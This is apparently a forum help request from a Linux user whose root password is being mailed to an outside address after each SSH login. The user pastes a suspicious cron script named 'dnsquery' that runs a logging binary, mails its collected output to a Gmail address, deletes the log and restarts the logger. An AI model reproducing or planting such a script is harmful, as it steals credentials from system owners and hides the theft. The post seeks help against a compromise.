I am facing a wired situation. Every time I ssh to my linux box, it automaticall send the root password to fackgames@gmail.com. Beside this I get a unusual cron under .etc/cron.daily. it's name dnsquery. Here is the content:
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
mkdir /usr/share/misc/
mkdir /usr/share/misc/blah/
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail fackgames@gmail.com -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
I have format the box and reinstall, but face the same. I have tried with uninstall the openssh & install it again. It goes ok for fewdays; after tahat the same. Any clue?

